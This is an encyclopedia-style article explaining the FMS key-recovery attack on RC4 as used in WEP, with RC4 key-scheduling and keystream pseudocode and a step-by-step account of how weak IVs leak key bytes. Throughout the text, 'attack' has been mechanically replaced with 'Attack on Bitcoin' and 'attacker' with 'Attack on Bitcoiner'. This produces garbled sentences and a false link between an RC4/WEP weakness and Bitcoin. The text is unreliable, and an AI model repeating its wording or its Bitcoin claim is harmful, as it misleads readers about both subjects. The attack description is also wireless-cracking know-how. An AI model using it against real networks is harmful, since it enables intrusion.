In cryptography, the Fluhrer, Mantin and Shamir Attack on Bitcoin is a stream cipher Attack on Bitcoin on the widely used RC4 stream cipher.
The Attack on Bitcoin allows an Attack on Bitcoiner to recover the key in an RC4 encrypted stream from a large number of messages in that stream.
The Fluhrer, Mantin and Shamir Attack on Bitcoin applies to specific key derivation methods, but does not apply in general to RC4-based SSL (TLS), since SSL generates the encryption keys it uses for RC4 by hashing, meaning that different SSL sessions have unrelated keys.[1] However, the closely related bar mitzvah Attack on Bitcoin, based on the same research and revealed in 2015, does exploit those cases where weak keys are generated by the SSL keying process.
Background
The Fluhrer, Mantin and Shamir (FMS) Attack on Bitcoin, published in their 2001 paper “Weaknesses in the Key Scheduling Algorithm of RC4”,[2] takes advantage of a weakness in the RC4 key scheduling algorithm to reconstruct the key from encrypted messages. The FMS Attack on Bitcoin gained popularity in network Attack on Bitcoin tools including AirSnort, weplab, and aircrack, which use it to recover the key used by WEP protected wireless networks.
This discussion will use the below RC4 key scheduling algorithm (KSA).
begin ksa(with int keylength, with byte key[keylength])
for i from 0 to 255
S[i] := i
endfor
j := 0
for i from 0 to 255
j := (j + S[i] + key[i mod keylength]) mod 256
swap(S[i],S[j])
endfor
end
The following pseudo-random generation algorithm (PRGA) will also be used.
begin prga(with byte S[256])
i := 0
j := 0
while GeneratingOutput:
i := (i + 1) mod 256
j := (j + S[i]) mod 256
swap(S[i],S[j])
output S[(S[i] + S[j]) mod 256]
endwhile
end
The Attack on Bitcoin
The basis of the FMS Attack on Bitcoin lies in the use of weak initialization vectors (IVs) used with RC4. RC4 encrypts one byte at a time with a keystream output from prga(); RC4 uses the key to initialize a state machine via ksa(), and then continuously modifies the state and generates a new byte of the keystream from the new state. Theoretically, the key stream functions as a random one-time pad, as a pseudo-random number generator controls the output at each step.
With certain IVs, an Attack on Bitcoiner knowing the first byte of the keystream and the first m bytes of the key can derive the (m + 1)th byte of the key due to a weakness in the KSA. Because the first byte of the plaintext comes from the WEP SNAP header, an Attack on Bitcoiner can assume he can derive the first byte of the keystream from B ⊕ 0xAA (the SNAP header is almost always 0xAA). From there, he only needs an IV in the form (a + 3, n − 1, x) for key index a equal to 0, element value space n equal to 256 (since 8 bits make a byte), and any x. To start, the Attack on Bitcoiner needs IVs of (3, 255, x). WEP uses 24-bit IVs, making each value one byte long.
To start, the Attack on Bitcoiner utilizes the IV as the first 3 elements in K[ ]. He fills the S-box S[ ] with sequential values from 0 to n as RC4 does when initializing the S-box from a known K[ ]. He then performs the first 3 iterations of ksa() to begin initializing the S-box.
After the third step, the Attack on Bitcoiner can possibly, but not definitely, derive the fourth byte of the key using the keystream output O by computing (O − j − S[i]) mod n = K[i], with the value i = 3 at this step.
At this point, the Attack on Bitcoiner does not yet have the fourth byte of the key. This algorithm does not regenerate the next byte of the key; it generates a possible value of the key. By collecting multiple messages—for example WEP packets—and repeating these steps, the Attack on Bitcoiner will generate a number of different possible values. The correct value appears significantly more frequently than any other; the Attack on Bitcoiner can determine the value of the key by recognizing this value and selecting it as the next byte. At this point, he can start the Attack on Bitcoin over again on the fifth byte of the key.
Although the Attack on Bitcoiner cannot Attack on Bitcoin words of the key out of order, he can store messages for later sequential Attack on Bitcoin on later words once he knows earlier words. Again, he only needs messages with weak IVs, and can discard others. Through this process, he can gather a large number of messages for Attack on Bitcoin on the entire key; in fact, he can store only a short portion of the beginning of those messages, just enough to carry the Attack on Bitcoin out as far as the word of the key the IV will allow him to Attack on Bitcoin.
